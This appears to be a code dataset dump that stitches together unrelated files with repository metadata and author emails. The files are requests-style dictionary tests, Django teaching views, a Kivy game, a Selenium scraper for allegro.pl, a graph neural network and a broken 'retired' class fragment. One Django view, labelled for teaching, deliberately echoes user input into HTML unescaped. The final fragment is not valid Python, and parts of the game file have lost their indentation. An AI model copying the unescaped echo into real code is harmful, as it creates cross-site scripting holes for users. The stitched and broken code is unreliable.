    """Behavioural test-suite for ``CaseInsensitiveDict``.

    Covers the mapping protocol end to end — construction, item access,
    mutation, iteration, equality and copying — always with deliberately
    mixed-case keys.
    """

    @pytest.mark.parametrize(
        'cid', (
            CaseInsensitiveDict({'Foo': 'foo', 'BAr': 'bar'}),
            CaseInsensitiveDict([('Foo', 'foo'), ('BAr', 'bar')]),
            CaseInsensitiveDict(FOO='foo', BAr='bar'),
        ))
    def test_init(self, cid):
        # All three construction forms must yield the same two entries.
        assert len(cid) == 2
        assert 'foo' in cid
        assert 'bar' in cid

    def test_docstring_example(self):
        cid = CaseInsensitiveDict()
        cid['Accept'] = 'application/json'
        # Lookups ignore case; iteration yields the original casing.
        assert cid['aCCEPT'] == 'application/json'
        assert list(cid) == ['Accept']

    def test_len(self):
        # Re-setting a key under a different case must not grow the dict.
        cid = CaseInsensitiveDict({'a': 'a', 'b': 'b'})
        cid['A'] = 'a'
        assert len(cid) == 2

    def test_getitem(self):
        cid = CaseInsensitiveDict({'Spam': 'blueval'})
        assert cid['spam'] == 'blueval'
        assert cid['SPAM'] == 'blueval'

    def test_fixes_649(self):
        """__setitem__ should behave case-insensitively."""
        cid = CaseInsensitiveDict()
        cid['spam'] = 'oneval'
        cid['Spam'] = 'twoval'
        cid['sPAM'] = 'redval'
        cid['SPAM'] = 'blueval'
        # Last write wins, and the stored key keeps the last casing used.
        assert cid['spam'] == 'blueval'
        assert cid['SPAM'] == 'blueval'
        assert list(cid.keys()) == ['SPAM']

    def test_delitem(self):
        cid = CaseInsensitiveDict()
        cid['Spam'] = 'someval'
        del cid['sPam']
        assert 'spam' not in cid
        assert len(cid) == 0

    def test_contains(self):
        cid = CaseInsensitiveDict()
        cid['Spam'] = 'someval'
        # Membership is case-blind for hits ...
        for variant in ('Spam', 'spam', 'SPAM', 'sPam'):
            assert variant in cid
        # ... but still exact about the word itself.
        assert 'notspam' not in cid

    def test_get(self):
        cid = CaseInsensitiveDict()
        cid['spam'] = 'oneval'
        cid['SPAM'] = 'blueval'
        for variant in ('spam', 'SPAM', 'sPam'):
            assert cid.get(variant) == 'blueval'
        assert cid.get('notspam', 'default') == 'default'

    def test_update(self):
        cid = CaseInsensitiveDict()
        cid['spam'] = 'blueval'
        cid.update({'sPam': 'notblueval'})
        assert cid['spam'] == 'notblueval'
        # Updating with differently-cased keys overwrites, never duplicates.
        cid = CaseInsensitiveDict({'Foo': 'foo', 'BAr': 'bar'})
        cid.update({'fOO': 'anotherfoo', 'bAR': 'anotherbar'})
        assert len(cid) == 2
        assert cid['foo'] == 'anotherfoo'
        assert cid['bar'] == 'anotherbar'

    def test_update_retains_unchanged(self):
        cid = CaseInsensitiveDict({'foo': 'foo', 'bar': 'bar'})
        cid.update({'foo': 'newfoo'})
        assert cid['bar'] == 'bar'

    def test_iter(self):
        cid = CaseInsensitiveDict({'Spam': 'spam', 'Eggs': 'eggs'})
        # Iteration yields the stored (original-case) keys.
        assert frozenset(iter(cid)) == frozenset(['Spam', 'Eggs'])

    def test_equality(self):
        cid = CaseInsensitiveDict({'SPAM': 'blueval', 'Eggs': 'redval'})
        othercid = CaseInsensitiveDict({'spam': 'blueval', 'eggs': 'redval'})
        assert cid == othercid
        del othercid['spam']
        assert cid != othercid
        # Comparison against a plain dict is case-insensitive too.
        assert cid == {'spam': 'blueval', 'eggs': 'redval'}
        assert cid != object()

    def test_setdefault(self):
        cid = CaseInsensitiveDict({'Spam': 'blueval'})
        assert cid.setdefault('spam', 'notblueval') == 'blueval'
        assert cid.setdefault('notspam', 'notblueval') == 'notblueval'

    def test_lower_items(self):
        cid = CaseInsensitiveDict({
            'Accept': 'application/json',
            'user-Agent': 'requests',
        })
        lowered = frozenset(key for key, _ in cid.lower_items())
        assert lowered == frozenset(['accept', 'user-agent'])

    def test_preserve_key_case(self):
        cid = CaseInsensitiveDict({
            'Accept': 'application/json',
            'user-Agent': 'requests',
        })
        expected = frozenset(['Accept', 'user-Agent'])
        assert frozenset(pair[0] for pair in cid.items()) == expected
        assert frozenset(cid.keys()) == expected
        assert frozenset(cid) == expected

    def test_preserve_last_key_case(self):
        cid = CaseInsensitiveDict({
            'Accept': 'application/json',
            'user-Agent': 'requests',
        })
        cid.update({'ACCEPT': 'application/json'})
        cid['USER-AGENT'] = 'requests'
        expected = frozenset(['ACCEPT', 'USER-AGENT'])
        assert frozenset(pair[0] for pair in cid.items()) == expected
        assert frozenset(cid.keys()) == expected
        assert frozenset(cid) == expected

    def test_copy(self):
        cid = CaseInsensitiveDict({
            'Accept': 'application/json',
            'user-Agent': 'requests',
        })
        cid_copy = cid.copy()
        assert cid == cid_copy
        # Mutating the original must not leak into the copy.
        cid['changed'] = True
        assert cid != cid_copy
|
[
"mperrott6@gmail.com"
] |
mperrott6@gmail.com
|
d086ad14264a8733e57a34e1b791e87cceb94aea
|
77653811587e0d9285380ae866952b3fcf09ae80
|
/dj4e-samples/views/home/views.py
|
5b39313b99df54f67ed3604356cbc6bfc4b1ded2
|
[
"MIT",
"CC-BY-3.0"
] |
permissive
|
natc23/SI_364_Local
|
477c82a74f7ac34bcca9db33c11ea6ec1c333cd5
|
e72c98bef29ee9d6cdb1b9c120152ffc007293d2
|
refs/heads/master
| 2020-04-24T00:37:57.639011
| 2019-04-12T01:17:48
| 2019-04-12T01:17:48
| 171,571,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,293
|
py
|
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.utils.html import escape
from django.views import View
# Create your views here.
def funky(request):
    """Serve a small static HTML page pointing at the sample repository."""
    page = """<html><body><p>This is the funky function sample</p>
<p>This sample code is available at
<a href="https://github.com/csev/dj4e-samples">
https://github.com/csev/dj4e-samples</a></p>
</body></html>"""
    return HttpResponse(page)
def danger(request):
    """Echo the ``guess`` GET parameter back *unescaped*.

    NOTE(review): intentionally XSS-vulnerable — it exists to contrast with
    game() below, which escapes the same input.  Never copy into real code.
    """
    page = """<html><body>
<p>Your guess was """ + request.GET['guess'] + """</p>
</body></html>"""
    return HttpResponse(page)
def game(request):
    """Echo the ``guess`` GET parameter back, HTML-escaped (safe variant)."""
    page = """<html><body>
<p>Your guess was """ + escape(request.GET['guess']) + """</p>
</body></html>"""
    return HttpResponse(page)
def bounce(request):
    """Redirect the browser to the DJ4E lessons page."""
    return HttpResponseRedirect('https://www.dj4e.com/lessons')
# https://docs.djangoproject.com/en/2.1/topics/class-based-views/
class MainView(View):
    """Class-based twin of funky(): serves the same kind of static page."""

    def get(self, request):
        """Handle GET with a fixed HTML body."""
        page = """<html><body><p>Hello world MainView in HTML</p>
<p>This sample code is available at
<a href="https://github.com/csev/dj4e-samples">
https://github.com/csev/dj4e-samples</a></p>
</body></html>"""
        return HttpResponse(page)
|
[
"nataliecieslak@yahoo.com"
] |
nataliecieslak@yahoo.com
|
652ef4afeaa7ab67f8b77fac953668d2568a8017
|
43c46e3ec632fd30d6705370b81fc7f94b8f0020
|
/main.py
|
0899c3ff1f7ebe8478ce752d0346d89fe553a33e
|
[] |
no_license
|
DavidJoanes/KIVY-GAMES
|
c401856e8a098270f401b2e98c07ced6b07ff421
|
045e1da375df9fd1094cb3feb809fed6a0c33dfc
|
refs/heads/master
| 2023-06-21T23:32:34.613921
| 2021-07-16T21:04:03
| 2021-07-16T21:04:03
| 379,648,497
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,874
|
py
|
from kivy import platform
from kivy.config import Config
from kivy.core.audio import SoundLoader
Config.set('graphics', 'width', '900')
Config.set('graphics', 'height', '400')
from kivymd.app import MDApp
from kivy.uix.relativelayout import RelativeLayout
import random, highscoreDatabase
from kivy.lang import Builder
from kivy.core.window import Window
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.graphics import Color, Line, Quad, Triangle
from kivy.properties import NumericProperty, Clock, ObjectProperty, StringProperty, BooleanProperty
from kivy.uix.actionbar import ActionBar
Builder.load_file("home.kv")
Builder.load_string('''
<ActionBar>:
pos_hint: {'top':1}
ActionView:
use_separator: True
ActionPrevious:
title: 'Spaceship Troopers'
with_previous: False
ActionOverflow:
ActionButton:
text: 'Btn0'
icon: 'atlas://data/images/defaulttheme/audio-volume-high'
ActionButton:
text: 'Help'
ActionGroup:
text: 'Difficulty'
ActionButton:
text: 'Novice'
ActionButton:
text: 'Professional'
ActionButton:
text: 'Expert'
ActionButton:
text: 'About'
''')
class CustomActionBar(ActionBar):
    """ActionBar subclass whose entire layout comes from the Builder rules
    loaded at module import time; no Python-side behaviour is added."""
class MainWidget(RelativeLayout):
from transforms import transform, transform_2D, transform_perspective
from userActions import keyboard_closed, on_keyboard_up, on_keyboard_down, on_touch_up, on_touch_down
home_widget = ObjectProperty()
perspective_point_x = NumericProperty(0)
perspective_point_y = NumericProperty(0)
vertical_NB_LINES = 8
vertical_LINE_SPACING = 0.3 # percentage of screen width
vertical_lines = []
horizontal_NB_LINES = 16
horizontal_LINE_SPACING = 0.1 # percentage of screen height
horizontal_lines = []
SPEED_Y = .05 # speed_y axis
SPEED_X = 1
current_offset_y = 0
current_y_loop = 0
current_speed_x = 0
current_offset_x = 0
number_of_tiles = 16
tiles = []
# tile_x = 1
# tile_y = 3
tiles_coordinates = []
ship = None
ship_width = 0.1
ship_height = 0.035
ship_base = 0.04
ship_coordinates = [(0, 0), (0, 0), (0, 0)]
game_over_state = False
game_started_state = False
start_game_enabled = BooleanProperty(False)
easy_mode_enabled = BooleanProperty(True)
medium_mode_enabled = BooleanProperty(True)
hard_mode_enabled = BooleanProperty(True)
game_mode = StringProperty("")
easy = False
medium = False
hard = False
home_title = StringProperty("S P A C E S H I P T R O O P E R S")
home_button_title = StringProperty("START")
new_highscore_title = StringProperty("")
highscore = []
high_scores = StringProperty("HIGH SCORES: ")
high_scores_enabled = BooleanProperty(True)
score_text = StringProperty()
begin_sound = None
welcome_sound = None
game_sound = None
game_over_sound = None
restart_sound = None
def __init__(self, **kwargs):
super(MainWidget, self).__init__(**kwargs)
# print("Init W: " +str(self.width)+ " H: " +str(self.height))
self.init_audio()
self.init_vertical_lines()
self.init_horizontal_lines()
self.init_tiles()
self.init_ship()
# self.prefill_tiles_coordinates()
# self.generate_tiles_coordinate()
self.reset_game()
if self.is_desktop():
self._keyboard = Window.request_keyboard(self.keyboard_closed, self)
self._keyboard.bind(on_key_down=self.on_keyboard_down)
self._keyboard.bind(on_key_up=self.on_keyboard_up)
Clock.schedule_interval(self.update, 1 / 60)
self.welcome_sound.play()
def init_audio(self):
self.welcome_sound = SoundLoader.load("audio/welcome.wav")
self.begin_sound = SoundLoader.load("audio/begin.wav")
self.game_sound = SoundLoader.load("audio/game_music2.mp3")
self.game_sound2 = SoundLoader.load("audio/game_music3.mp3")
self.game_over_sound = SoundLoader.load("audio/game_over.wav")
self.restart_sound = SoundLoader.load("audio/restart.wav")
self.welcome_sound.volume = 1
self.begin_sound.volume = .5
self.game_sound.volume = 1
self.game_sound2.volume = 1
self.game_over_sound.volume = .7
self.restart_sound.volume = .8
def reset_game(self):
    """Reset scrolling, score and track state for a fresh run."""
    # Zero every per-run counter in one pass.
    for counter in ('current_offset_y', 'current_y_loop',
                    'current_speed_x', 'current_offset_x'):
        setattr(self, counter, 0)
    # Rebuild the track from scratch.
    self.tiles_coordinates = []
    self.prefill_tiles_coordinates()
    self.generate_tiles_coordinate()
    self.score_text = "SCORE: " + str(self.current_y_loop)
    self.game_over_state = False
def is_desktop(self):
    """Return True on desktop OSes, where a physical keyboard is expected."""
    return platform in ("linux", "win", "macosx")
def init_ship(self):
with self.canvas:
Color(0, 0, 0)
self.ship = Triangle()
def update_ship(self):
center_x = self.width / 2
base_y = self.ship_base * self.height
ship_half_width = (self.ship_width * self.width) / 2
ship_height = self.ship_height * self.height
# 2
# 1 3
# self.transform
self.ship_coordinates[0] = (center_x - ship_half_width, base_y)
self.ship_coordinates[1] = (center_x, base_y + ship_height)
self.ship_coordinates[2] = (center_x + ship_half_width, base_y)
x1, y1 = self.transform(*self.ship_coordinates[0])
x2, y2 = self.transform(*self.ship_coordinates[1])
x3, y3 = self.transform(*self.ship_coordinates[2])
self.ship.points = [x1, y1, x2, y2, x3, y3]
def check_ship_collision(self):
    """Return True while the ship overlaps a track tile.

    Despite the name, "collision" with a tile means the ship is safely on
    the track; a False result means it has left the path (caller treats
    that as game over).
    """
    for tile_x, tile_y in self.tiles_coordinates:
        if tile_y > self.current_y_loop + 1:
            # Tiles are ordered by y; anything further ahead cannot touch
            # the ship, so stop scanning early.
            return False
        if self.check_for_collision_with_tile(tile_x, tile_y):
            return True
    return False
def check_for_collision_with_tile(self, tile_x, tile_y):
    """Return True if any of the ship's three vertices lies inside the
    axis-aligned bounding box of tile (tile_x, tile_y)."""
    xmin, ymin = self.get_tile_coordinates(tile_x, tile_y)
    xmax, ymax = self.get_tile_coordinates(tile_x + 1, tile_y + 1)
    return any(
        xmin <= px <= xmax and ymin <= py <= ymax
        for px, py in self.ship_coordinates[:3]
    )
def init_tiles(self):
with self.canvas:
Color(1, 1, 1)
for x in range(0, self.number_of_tiles):
self.tiles.append(Quad())
def prefill_tiles_coordinates(self):
    """Seed the track with ten straight tiles in column 0."""
    self.tiles_coordinates.extend((0, y) for y in range(10))
def generate_tiles_coordinate(self):
last_value_of_x = 0
last_value_of_y = 0
# clean the coordinates that are out of the screen
# tile_y < self.current_y_loop
for x in range(len(self.tiles_coordinates) - 1, -1, -1):
if self.tiles_coordinates[x][1] < self.current_y_loop:
del self.tiles_coordinates[x]
if len(self.tiles_coordinates) > 0:
last_coordinates = self.tiles_coordinates[-1]
last_value_of_x = last_coordinates[0]
last_value_of_y = last_coordinates[1] + 1
for x in range(len(self.tiles_coordinates), self.number_of_tiles):
random_value = random.randint(0, 2)
# 0 -> straight
# 1 -> right
# 2 -> left
start_index = -int(self.vertical_NB_LINES / 2) + 1
end_index = start_index + self.vertical_NB_LINES - 2
if last_value_of_x <= start_index:
random_value = 1
if last_value_of_x >= end_index:
random_value = 2
self.tiles_coordinates.append((last_value_of_x, last_value_of_y))
if random_value == 1:
last_value_of_x += 1
self.tiles_coordinates.append((last_value_of_x, last_value_of_y))
last_value_of_y += 1
self.tiles_coordinates.append((last_value_of_x, last_value_of_y))
if random_value == 2:
last_value_of_x -= 1
self.tiles_coordinates.append((last_value_of_x, last_value_of_y))
last_value_of_y += 1
self.tiles_coordinates.append((last_value_of_x, last_value_of_y))
last_value_of_y += 1
def init_vertical_lines(self):
with self.canvas:
Color(0, 1, 1)
# self.line = Line(points=[100, 0, 100, 100])
for x in range(0, self.vertical_NB_LINES):
self.vertical_lines.append(Line())
def get_lineX_from_index(self, index):
central_line_x = self.perspective_point_x
spacing = self.vertical_LINE_SPACING * self.width
offset = index - 0.5
line_x = central_line_x + (offset * spacing + self.current_offset_x)
return line_x
def get_lineY_from_index(self, index):
spacing_y = self.horizontal_LINE_SPACING * self.height
line_y = index * spacing_y - self.current_offset_y
return line_y
def get_tile_coordinates(self, tile_x, tile_y):
    """Convert tile grid indices to the screen-space (x, y) of its corner.

    The y index is expressed relative to the current scroll loop so tiles
    move toward the player as ``current_y_loop`` grows.
    """
    relative_y = tile_y - self.current_y_loop
    return self.get_lineX_from_index(tile_x), self.get_lineY_from_index(relative_y)
def update_tiles(self):
for x in range(0, self.number_of_tiles):
tile = self.tiles[x]
tile_coordinates = self.tiles_coordinates[x]
xmin, ymin = self.get_tile_coordinates(tile_coordinates[0], tile_coordinates[1])
xmax, ymax = self.get_tile_coordinates(tile_coordinates[0] + 1, tile_coordinates[1] + 1)
# 2 3
#
# 1 4
x1, y1 = self.transform(xmin, ymin)
x2, y2 = self.transform(xmin, ymax)
x3, y3 = self.transform(xmax, ymax)
x4, y4 = self.transform(xmax, ymin)
tile.points = [x1, y1, x2, y2, x3, y3, x4, y4]
def update_vertical_lines(self):
# -1 0 1 2
start_index = -int(self.vertical_NB_LINES / 2) + 1
for x in range(start_index, start_index + self.vertical_NB_LINES):
line_x = self.get_lineX_from_index(x)
x1, y1 = self.transform(line_x, 0)
x2, y2 = self.transform(line_x, self.height)
self.vertical_lines[x].points = [x1, y1, x2, y2]
def init_horizontal_lines(self):
with self.canvas:
Color(0, 1, 1)
for x in range(0, self.horizontal_NB_LINES):
self.horizontal_lines.append(Line())
def update_horizontal_lines(self):
start_index = -int(self.vertical_NB_LINES / 2) + 1
end_index = (start_index + self.vertical_NB_LINES) - 1
xmin = self.get_lineX_from_index(start_index)
xmax = self.get_lineX_from_index(end_index)
for x in range(0, self.horizontal_NB_LINES):
line_y = self.get_lineY_from_index(x)
x1, y1 = self.transform(xmin, line_y)
x2, y2 = self.transform(xmax, line_y)
self.horizontal_lines[x].points = [x1, y1, x2, y2]
def update(self, dt):
    """Per-frame callback (scheduled at 60 FPS from __init__).

    Redraws the track and ship, advances the scroll while a run is active,
    ramps the difficulty, and switches to the game-over screen when the
    ship leaves the track.
    """
    # Normalise to the 60 FPS the speeds were tuned for.
    time_factor = dt * 60
    self.update_vertical_lines()
    self.update_horizontal_lines()
    self.update_tiles()
    self.update_ship()

    if not self.game_over_state and self.game_started_state:
        # This frame scrolls at the SPEED_Y chosen on the previous frame;
        # the ramp below only affects subsequent frames (as in the original).
        speed_y = (self.SPEED_Y * self.height) / 100
        self.current_offset_y += (speed_y * time_factor)

        spacing_y = self.horizontal_LINE_SPACING * self.height
        while self.current_offset_y >= spacing_y:
            # One full row scrolled past: score a point and extend the track.
            self.current_offset_y -= spacing_y
            self.current_y_loop += 1
            self.score_text = "SCORE: " + str(self.current_y_loop)
            self.generate_tiles_coordinate()

        # Difficulty ramp as (score threshold, SPEED_Y) pairs applied in
        # order: the last threshold reached wins, which reproduces the
        # original cascading if-chains exactly — including the Easy-mode
        # 400 -> 2.6 spike (looks like a typo, preserved verbatim;
        # TODO confirm with the author).
        speed_tiers = {
            "Easy": ((0, .05), (5, .1), (20, .15), (60, .2), (100, .25),
                     (130, .3), (160, .35), (200, .4), (240, .45), (280, .5),
                     (320, .55), (360, .6), (400, 2.6), (450, .65), (500, .7),
                     (600, .725), (800, .75), (1100, .775), (1300, .85),
                     (1500, 1.0), (1700, 1.025), (2000, 1.05), (2200, 1.1),
                     (2500, 1.125), (2800, 1.15), (3200, 1.2), (3500, 1.25)),
            "Medium": ((0, .1), (5, .15), (20, .2), (60, .25), (100, .3),
                       (200, .35), (350, .4), (400, .45), (550, .5),
                       (750, .6), (950, .7), (1050, .8), (1350, .9),
                       (1500, 1.0), (1700, 1.2)),
            "Hard": ((0, .2), (5, .3), (15, .4), (30, .5), (90, .65),
                     (150, .8), (300, 1.05), (450, 1.2), (650, 1.35),
                     (750, 1.45), (850, 1.6), (950, 1.7), (1050, 1.8),
                     (1200, 1.95), (1400, 2.2)),
        }
        for threshold, speed in speed_tiers.get(self.game_mode, ()):
            if self.current_y_loop >= threshold:
                self.SPEED_Y = speed

        # Horizontal steering.
        speed_x = (self.current_speed_x * self.width) / 100
        self.current_offset_x += (speed_x * time_factor)

    if not self.check_ship_collision() and not self.game_over_state:
        # The ship left the track: freeze the game and show the overlay.
        self.game_over_state = True
        self.home_title = "G A M E O V E R !"
        self.home_button_title = "RESTART"
        self.home_widget.opacity = 1
        self.game_sound.stop()
        self.game_sound2.stop()
        self.game_over_sound.play()
        if highscoreDatabase.newHighScore(self.current_y_loop):
            new = highscoreDatabase.newHighScore(self.current_y_loop)
            highscoreDatabase.addHighScore(self.current_y_loop)
            self.new_highscore_title = f"New Highscore!: {new}"
        else:
            self.new_highscore_title = ""
        Clock.schedule_once(self.continue_playing_game_sound, 220)
# def play_game_over_sound(self, dt):
# self.game_over_sound.play()
def continue_playing_game_sound(self, dt):
if not self.game_over_state:
self.game_sound2.play()
def game_started(self):
if self.game_over_state:
self.restart_sound.play()
self.game_sound.play()
else:
self.game_sound.play()
Clock.schedule_once(self.continue_playing_game_sound, 220)
self.reset_game()
self.game_started_state = True
self.home_widget.opacity = 0
def easy_mode(self, widget):
self.easy = True
if widget.state == "normal":
widget.text = "Easy"
self.start_game_enabled = False
self.medium_mode_enabled = True
self.hard_mode_enabled = True
else:
widget.text = "EASY"
self.game_mode = "Easy"
self.start_game_enabled = True
self.medium_mode_enabled = False
self.hard_mode_enabled = False
def medium_mode(self, widget):
self.medium = True
if widget.state == "normal":
widget.text = "Medium"
self.start_game_enabled = False
self.easy_mode_enabled = True
self.hard_mode_enabled = True
else:
widget.text = "MEDIUM"
self.game_mode = "Medium"
self.start_game_enabled = True
self.easy_mode_enabled = False
self.hard_mode_enabled = False
def hard_mode(self, widget):
self.hard = True
if widget.state == "normal":
widget.text = "Hard"
self.start_game_enabled = False
self.easy_mode_enabled = True
self.medium_mode_enabled = True
else:
widget.text = "HARD"
self.game_mode = "Hard"
self.start_game_enabled = True
self.easy_mode_enabled = False
self.medium_mode_enabled = False
def high_score_mode(self, widget):
new = highscoreDatabase.viewHighScores()
self.high_scores_enabled = True
if widget.state == "normal":
widget.text = "View"
self.high_scores = f"HIGH SCORES: "
else:
widget.text = "Close"
self.high_scores = f"HIGH SCORES: {new}"
class Spaceship_Troopers(MDApp):
def build(self):
self.title = "Spaceship Troopers"
pass
if __name__ == "__main__":
Spaceship_Troopers().run()
|
[
"DavidJoanes@users.noreply.github.com"
] |
DavidJoanes@users.noreply.github.com
|
aad1f4c9e8e6f67d4f567d20487589670cb03012
|
f9b76428cd81aeda45b879a3f496139199b92839
|
/productosObj.py
|
9aca9ede17e6905845c325309032aa75eb3eaf7c
|
[] |
no_license
|
melanieepena/PruebaHeroku
|
3b104a1669935ad8bbb36cbe0574ad23d6ddf39f
|
8919eaadb05d486e3e7374b2ab9389d3621c79cb
|
refs/heads/master
| 2022-12-10T16:28:02.338168
| 2020-08-24T00:20:44
| 2020-08-24T00:20:44
| 288,928,821
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 729
|
py
|
class productosObj:
    """Plain data holder for a product record.

    NOTE(review): the Java-style get* accessors are kept for interface
    compatibility with existing callers; the attributes are also readable
    directly.
    """

    def __init__(self, id, name, picture, desc, costo, precio, patente, id_emp):
        # Bulk-assign every constructor argument to a same-named attribute.
        for attr, value in (('id', id), ('name', name), ('picture', picture),
                            ('desc', desc), ('costo', costo), ('precio', precio),
                            ('patente', patente), ('id_emp', id_emp)):
            setattr(self, attr, value)

    def getId(self):
        return self.id

    def getName(self):
        return self.name

    def getPicture(self):
        return self.picture

    def getDesc(self):
        return self.desc

    def getCosto(self):
        return self.costo

    def getPrecio(self):
        return self.precio

    def getPatente(self):
        return self.patente

    def getIdEmp(self):
        return self.id_emp
|
[
"meelpg8@gmail.com"
] |
meelpg8@gmail.com
|
acd3097659c130224500a4c3e8df92e6398f16c0
|
3fb6a7931344bf8bb32fd844c91246f386f16763
|
/webscrape.py
|
0cdb15a8ca29552192cf8d61e46965d399ddb8e5
|
[] |
no_license
|
Brat-Pit/allegro
|
96f69d591776d11de791f63d700c7cc113086e08
|
1f87b242c775be4d55a6ebb0bad8120f99af7163
|
refs/heads/master
| 2021-01-05T14:48:31.697752
| 2020-02-26T08:54:36
| 2020-02-26T08:54:36
| 241,054,400
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,665
|
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
import random
import time
state="nowe" #new products only
offer_type="kup teraz" #buy now format only
max_number_subpages=3
def pause():
    """Sleep a random ~9.5-11.1 s to mimic a human between page loads."""
    time.sleep(random.randint(9500, 11073) / 1000)
# Create a new Firefox session for scraping.
driver = webdriver.Firefox()
driver.implicitly_wait(10)

# Category URL pre-filtered to new, buy-now soy candles.
url = "https://allegro.pl/kategoria/swiece-i-swieczniki-swiece-254295?stan=nowe&offerTypeBuyNow=1&string=sojowa&order=qd"
driver.get(url)

# The site shows an interstitial ad that requires a manual dismissal.
pause()

# NOTE(review): range(1, max_number_subpages) visits at most
# max_number_subpages - 1 pages — confirm whether the bound was intended
# to be inclusive.
for subpage_no in range(1, max_number_subpages):
    # Extract header / offer count / price / link from every listing tile.
    for offer in driver.find_elements_by_xpath("//div[@class='_00d6b80']"):
        header = offer.find_element_by_class_name("ebc9be2").text
        item_offers_no = offer.find_element_by_xpath('.//span[@class = "_41ddd69"]').get_attribute('innerHTML')
        price = offer.find_element_by_xpath('.//span[@class = "fee8042"]').text
        link = offer.find_element_by_css_selector('h2.ebc9be2>a').get_attribute('href')
        print(header + ' | ' + item_offers_no + ' | ' + price + ' | ' + link)

    # Stop when the pager reports the last subpage; otherwise click 'Next'.
    current_subpage_no = driver.find_element_by_xpath("//input[@class='_14uqc _1r8rh _u5o1q _1t9p2 _cc6ig _3db39_3ISNX']").get_attribute('value')
    subpages_total_no = driver.find_element_by_xpath("//span[@class='_1h7wt _1fkm6 _g1gnj _3db39_3i0GV _3db39_XEsAE']").text
    if current_subpage_no == subpages_total_no:
        break
    driver.find_element_by_xpath("//span[@class='_lsy4e _1y3c2 _3db39_mcaVQ _ls4gg']").click()
    pause()
|
[
"noreply@github.com"
] |
Brat-Pit.noreply@github.com
|
f76bfd3907c9b45e0c1e3ac4c3b1d3e439abc05a
|
7b6fce880a3c4ca45c6889273bff7e4f59efebbb
|
/kaolin/models/GraphResNet.py
|
e85eb73b7882e71920b33efcb51a81dd15c084ad
|
[
"Apache-2.0"
] |
permissive
|
Jean-Francois-Lafleche/kaolin
|
f4c7d023d74af54b04852b6026e55ddd5d7ea198
|
a8055112566d43ca5d3b4d44041ea2303b314a1a
|
refs/heads/master
| 2023-01-11T01:23:40.934370
| 2019-12-02T22:05:08
| 2019-12-02T22:05:08
| 222,455,742
| 2
| 1
|
NOASSERTION
| 2020-01-10T21:47:15
| 2019-11-18T13:28:36
|
C++
|
UTF-8
|
Python
| false
| false
| 2,926
|
py
|
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import torch
from torch import nn
from torch.nn.parameter import Parameter
import torch.nn.functional as F
import torch
from torch.nn import Parameter
from .SimpleGCN import SimpleGCN
class GraphResNet(nn.Module):
    r"""An enhanced version of the MeshEncoder; uses residual connections
    across graph convolution layers.

    The network stacks seven residual stages of ``SimpleGCN`` layers; each
    stage computes ``features = (features + relu(gc(relu(gc(features))))) / 2``
    and the final layer projects to ``output_features`` per vertex (3 by
    default — presumably xyz coordinates; confirm against callers).

    Args:
        input_features (int): size of the per-vertex input feature vectors.
        hidden (int): width of the hidden graph-convolution layers.
        output_features (int): size of the per-vertex output (default 3).
    """

    def __init__(self, input_features, hidden=192, output_features=3):
        # BUG FIX: the original called super(G_Res_Net, self).__init__(),
        # but no class named G_Res_Net exists in this module, so every
        # attempt to construct the model raised NameError.
        super(GraphResNet, self).__init__()
        self.gc1 = SimpleGCN(input_features, hidden)
        # gc2 .. gc13 all map hidden -> hidden.  Assigning via setattr still
        # registers each layer on the Module under the original names
        # gc2..gc13, so existing checkpoints/state_dicts keep loading.
        for i in range(2, 14):
            setattr(self, 'gc{}'.format(i), SimpleGCN(hidden, hidden))
        self.gc14 = SimpleGCN(hidden, output_features)
        self.hidden = hidden

    def forward(self, features, adj):
        """Run the residual GCN stack.

        Args:
            features: per-vertex input features; the first residual skip
                truncates them to the first ``hidden`` channels, so the
                last dimension must be >= ``hidden``.
            adj: graph adjacency passed to every SimpleGCN layer.

        Returns:
            tuple: ``(coords, features)`` — the output of the final
            projection layer and the hidden features that fed it.
        """
        # Stage 1: skip path truncates the input to `hidden` channels.
        x = F.relu(self.gc2(F.relu(self.gc1(features, adj)), adj))
        features = (features[..., :self.hidden] + x) / 2.
        # Stages 2-6: identical two-convolution residual blocks.
        for gc_a, gc_b in ((self.gc3, self.gc4), (self.gc5, self.gc6),
                           (self.gc7, self.gc8), (self.gc9, self.gc10),
                           (self.gc11, self.gc12)):
            x = F.relu(gc_b(F.relu(gc_a(features, adj)), adj))
            features = (features + x) / 2.
        # Stage 7: a single convolution before the output projection.
        x = F.relu(self.gc13(features, adj))
        features = (features + x) / 2.
        coords = self.gc14(features, adj)
        return coords, features
|
[
"krrish94@gmail.com"
] |
krrish94@gmail.com
|
f13d147263b867639723411587d960b2c9b032ac
|
242c84cdee8a0f5c5b0e9eb5cdab5078e2feb357
|
/code.py
|
d009687a6e8fdc82e48ea8d2cbb5c757295e9a8b
|
[] |
no_license
|
MohanSharmav/zekelabslabs-assignment
|
bffb22286701d597afb67433c68852310f006a14
|
e1a2fd21831f24f698a4e2c24a32cde4f921aca9
|
refs/heads/master
| 2020-12-04T22:34:10.847187
| 2020-01-05T13:50:40
| 2020-01-05T13:50:40
| 231,923,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,787
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 5 07:00:43 2020
@author: mohan
class retired:
# defining the class
names=input(sting())
couple=input(boolean())
def allocatefund(self,fund):
#defining funtion alocate funds
self.fund=fund
def fund(self):
return self.fund
def __str9__(self):
return "%s is a %s" % (self.fund)
def jointhemself(self,name,couple)
#defining function jointemself
self.name=namevv
self.couple=couple
def name(self):
return self.name
def couple(self):
return self.couple
def __str8__(self):
return "%s is a %s" % (self.name, self.couple)
def approve(self,accept):
#define approve function
self.accept=accept
def accept(self):
return self.accept
def __str7__(self):
return "%s is a %s" % (self.accept)
class young:
name=string(input())
gender=string(input())
#define young class
